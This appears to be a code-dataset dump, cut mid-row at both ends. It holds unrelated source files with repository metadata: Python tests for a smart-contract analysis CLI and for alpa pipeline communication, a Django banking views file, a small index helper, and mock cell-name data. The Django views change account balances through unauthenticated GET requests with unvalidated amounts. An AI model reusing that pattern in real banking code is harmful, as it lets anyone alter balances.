assert "Assert Violation" in result.output
assert result.exit_code == 0
def test_report_simple_filter():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"simple",
"analysis",
"report",
"--min-severity",
"high",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert "SWC-110" not in result.output
assert result.exit_code == 0
| 25.705882 | 86 | 0.478719 | 776 | 8,740 | 5.259021 | 0.094072 | 0.055869 | 0.050968 | 0.090174 | 0.912521 | 0.903945 | 0.879686 | 0.879686 | 0.879686 | 0.848076 | 0 | 0.085029 | 0.40389 | 8,740 | 339 | 87 | 25.781711 | 0.698273 | 0 | 0 | 0.743056 | 0 | 0 | 0.203661 | 0.106751 | 0 | 0 | 0 | 0 | 0.121528 | 1 | 0.055556 | false | 0 | 0.017361 | 0 | 0.072917 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0ff850790a22246f8bef5fd06a5b8ef12a4ef96c | 3,955 | py | Python | tests/test_pipeline_reduce_scatter.py | yf225/alpa | a7b5f061537e260875c621a82e14265b1df64c5f | [
"Apache-2.0"
] | null | null | null | tests/test_pipeline_reduce_scatter.py | yf225/alpa | a7b5f061537e260875c621a82e14265b1df64c5f | [
"Apache-2.0"
] | null | null | null | tests/test_pipeline_reduce_scatter.py | yf225/alpa | a7b5f061537e260875c621a82e14265b1df64c5f | [
"Apache-2.0"
] | null | null | null | import unittest
from alpa.testing import PipelineBasicTest
from alpa.global_env import global_config
from alpa.util import count_communication_primitives
as_option = global_config.default_autosharding_option
class PipelineReduceScatterTest(PipelineBasicTest):
def test_mlp_grad_acc_friendly(self):
as_option.force_data_parallel = True
as_option.prefer_reduce_scatter = True
hlo_text = self.run_mlp(do_numerical_test=True)
# Check number of communication primitives
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[0],
ignore_scalar_all_reduce=True))
assert n_total == 0
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[1],
ignore_scalar_all_reduce=True))
assert n_total == 0
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[2],
ignore_scalar_all_reduce=True))
assert n_total == n_all_reduce == 1
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[3],
ignore_scalar_all_reduce=True))
assert n_total == n_all_reduce == 1
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[4],
ignore_scalar_all_reduce=True))
assert n_total == n_all_gather == 1
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[5],
ignore_scalar_all_reduce=True))
assert n_total == n_all_gather == 1
def test_bert_grad_acc_friendly(self):
as_option.force_data_parallel = True
as_option.prefer_reduce_scatter = True
hlo_text = self.run_n_layer_bert(n_layers=2, do_numerical_test=True)
# Check numbers of communication primitives
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[0],
ignore_scalar_all_reduce=True))
assert n_total == 0
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[1],
ignore_scalar_all_reduce=True))
assert n_total == 0
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[2],
ignore_scalar_all_reduce=True))
assert n_total == n_all_reduce == 1
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[3],
ignore_scalar_all_reduce=True))
assert n_total == n_all_reduce == 1
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[4],
ignore_scalar_all_reduce=True))
assert n_total == n_all_gather == 1
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[5],
ignore_scalar_all_reduce=True))
assert n_total == n_all_gather == 1
def suite():
suite = unittest.TestSuite()
suite.addTest(PipelineReduceScatterTest('test_mlp_grad_acc_friendly'))
suite.addTest(PipelineReduceScatterTest('test_bert_grad_acc_friendly'))
return suite
if __name__ == "__main__":
runner = unittest.TextTestRunner()
runner.run(suite())
| 41.631579 | 76 | 0.62579 | 470 | 3,955 | 4.731915 | 0.142553 | 0.057554 | 0.06295 | 0.089928 | 0.808453 | 0.759892 | 0.759892 | 0.759892 | 0.759892 | 0.759892 | 0 | 0.009117 | 0.3067 | 3,955 | 94 | 77 | 42.074468 | 0.801969 | 0.020733 | 0 | 0.742857 | 0 | 0 | 0.015762 | 0.013695 | 0 | 0 | 0 | 0 | 0.171429 | 1 | 0.042857 | false | 0 | 0.057143 | 0 | 0.128571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e83f6f9eaf9da7dc1eae7123914d4433daf584c7 | 4,043 | py | Python | mysite/ubibank/views.py | PUNITKUMARGAUTAM/mydjango | 5dd86a99bc0fae0cad712412d2de9c0c6cee6dcc | [
"MIT"
] | null | null | null | mysite/ubibank/views.py | PUNITKUMARGAUTAM/mydjango | 5dd86a99bc0fae0cad712412d2de9c0c6cee6dcc | [
"MIT"
] | null | null | null | mysite/ubibank/views.py | PUNITKUMARGAUTAM/mydjango | 5dd86a99bc0fae0cad712412d2de9c0c6cee6dcc | [
"MIT"
] | null | null | null | from django.http import HttpResponse
from django.shortcuts import render
from ubibank.models import Bank
# Create your views here.
def UBI(request):
Acno=""
Acname=""
Actype=""
Acbal=""
Acmbno=""
email=""
cmd=""
result=""
if request.GET:
Acno=request.GET["Acno"]
Acname=request.GET["Acname"]
Actype=request.GET["Actype"]
Acbal=request.GET["Acbal"]
Acmbno=request.GET["Acmbno"]
email=request.GET["email"]
ubibank=Bank(Acno=Acno,Acname=Acname,Actype=Actype,Acbal=Acbal,Acmbno=Acmbno,email=email)
ubibank.save()
result="Inserted Succesfully"
data={"result":result,"Acno":Acno,"Acname":Acname,"Actype":Actype,"Acbal":Acbal,"Acmbno":Acmbno,"email":email}
return render(request,"Home.html",{"data":data})
def withdrawl(request):
Acno=""
Acname=""
Actype=""
Acbal=""
Acmbno=""
email=""
cmd=""
result=""
if request.GET:
cmd=request.GET["command"]
if cmd=="search":
Acno=request.GET["Acno"]
ubibank=Bank.objects.filter(Acno=Acno)
if len(ubibank)==0:
result="no data found"
else:
Acno=ubibank[0].Acno
Acname=ubibank[0].Acname
Actype=ubibank[0].Actype
Acbal=ubibank[0].Acbal
Acmbno=ubibank[0].Acmbno
email=ubibank[0].email
ubibank[0].save()
result="Search sucess"
data={"result":result,"Acno":Acno,"Acname":Acname,"Actype":Actype,"Acbal":Acbal,"Acmbno":Acmbno,"email":email}
return render(request,"withdrawl.html",{"data":data})
if cmd=="withdrawl":
Acno=request.GET["Acno"]
ubibank=Bank.objects.filter(Acno=Acno)
if len(ubibank)==0:
result="no data found"
else:
Acname=ubibank[0].Acname
Actype=ubibank[0].Actype
amount=int(request.GET["amount"])
ubibank[0].Acbal=str(int(ubibank[0].Acbal)-amount)
Acbal=ubibank[0].Acbal
Acmbno=ubibank[0].Acmbno
email=ubibank[0].email
ubibank[0].save()
result="withdrawl success"
data={"result":result,"Acno":Acno,"Acname":Acname,"Actype":Actype,"Acbal":Acbal,"Acmbno":Acmbno,"email":email}
return render(request,"withdrawl.html",{"data":data})
def deposite(request):
Acno=""
Acname=""
Actype=""
Acbal=""
Acmbno=""
email=""
cmd=""
result=""
if request.GET:
cmd=request.GET["command"]
if cmd=="search":
Acno=request.GET["Acno"]
ubibank=Bank.objects.filter(Acno=Acno)
if len(ubibank)==0:
result="no data found"
else:
Acno=ubibank[0].Acno
Acname=ubibank[0].Acname
Actype=ubibank[0].Actype
Acbal=ubibank[0].Acbal
Acmbno=ubibank[0].Acmbno
email=ubibank[0].email
ubibank[0].save()
result="Search sucess"
data={"result":result,"Acno":Acno,"Acname":Acname,"Actype":Actype,"Acbal":Acbal,"Acmbno":Acmbno,"email":email}
return render(request,"deposite.html",{"data":data})
if cmd=="deposite":
Acno=request.GET["Acno"]
ubibank=Bank.objects.filter(Acno=Acno)
if len(ubibank)==0:
result="no data found"
else:
Acname=ubibank[0].Acname
Actype=ubibank[0].Actype
amount=int(request.GET["amount"])
ubibank[0].Acbal=str(int(ubibank[0].Acbal)+amount)
Acbal=ubibank[0].Acbal
Acmbno=ubibank[0].Acmbno
email=ubibank[0].email
ubibank[0].save()
result="deposite success"
data={"result":result,"Acno":Acno,"Acname":Acname,"Actype":Actype,"Acbal":Acbal,"Acmbno":Acmbno,"email":email}
return render(request,"deposite.html",{"data":data})
| 31.834646 | 121 | 0.554044 | 450 | 4,043 | 4.977778 | 0.111111 | 0.121429 | 0.046429 | 0.053571 | 0.839732 | 0.835268 | 0.835268 | 0.835268 | 0.835268 | 0.835268 | 0 | 0.01183 | 0.289142 | 4,043 | 127 | 122 | 31.834646 | 0.767571 | 0.005689 | 0 | 0.8125 | 0 | 0 | 0.126151 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026786 | false | 0 | 0.026786 | 0 | 0.098214 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e84db5cbe0abe9dab9039b9b8344222f10d0922f | 694 | py | Python | ksm-v2/compiler-src/cursed.py | jake-87/ksm | 0ca94ca3bc012a10ad2e1e32d0d791f66fbc8c60 | [
"BSD-3-Clause"
] | 1 | 2021-11-19T00:10:04.000Z | 2021-11-19T00:10:04.000Z | ksm-v2/compiler-src/cursed.py | jake-87/ksm | 0ca94ca3bc012a10ad2e1e32d0d791f66fbc8c60 | [
"BSD-3-Clause"
] | null | null | null | ksm-v2/compiler-src/cursed.py | jake-87/ksm | 0ca94ca3bc012a10ad2e1e32d0d791f66fbc8c60 | [
"BSD-3-Clause"
] | null | null | null | def evil(tok):
# We don't talk about this file.
try:
a = tok[0]
try:
b = tok[1]
try:
c = tok[2]
except IndexError:
c = ""
except IndexError:
b = ""
try:
c = tok[2]
except IndexError:
c = ""
except IndexError:
a = ""
try:
b = tok[1]
try:
c = tok[2]
except IndexError:
c = ""
except IndexError:
b = ""
try:
c = tok[2]
except IndexError:
c = ""
return (a, b, c) | 22.387097 | 36 | 0.31268 | 63 | 694 | 3.444444 | 0.31746 | 0.516129 | 0.129032 | 0.147465 | 0.764977 | 0.764977 | 0.764977 | 0.764977 | 0.764977 | 0.691244 | 0 | 0.024735 | 0.592219 | 694 | 31 | 37 | 22.387097 | 0.742049 | 0.043228 | 0 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e86105bc6c92be7bdb3a22e919889f07d3ac78d8 | 445,695 | py | Python | tests/mock_data/expression/matrix_mtx/AB_toy_data_toy_models.py | broadinstitute/scp-ingest-service | 1a63a27061b53a5f7909c72d59808f9af71456a6 | [
"BSD-3-Clause"
] | 1 | 2020-06-08T16:30:47.000Z | 2020-06-08T16:30:47.000Z | tests/mock_data/expression/matrix_mtx/AB_toy_data_toy_models.py | broadinstitute/scp-ingest-service | 1a63a27061b53a5f7909c72d59808f9af71456a6 | [
"BSD-3-Clause"
] | 146 | 2019-07-25T13:09:47.000Z | 2022-03-28T19:29:22.000Z | tests/mock_data/expression/matrix_mtx/AB_toy_data_toy_models.py | broadinstitute/scp-ingest-service | 1a63a27061b53a5f7909c72d59808f9af71456a6 | [
"BSD-3-Clause"
] | null | null | null | from bson.objectid import ObjectId
AB_toy_data_toy_data_models = {
"data_arrays": {
"AB_toy_data_toy.matrix.mtx Cells": {
"name": "AB_toy_data_toy.matrix.mtx Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB7_BazMoo_5CBDCCDBCDBCDCCC-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB7_BazMoo_5DAADBACDAADAABB-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_6DADBACAAACBDDAA-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
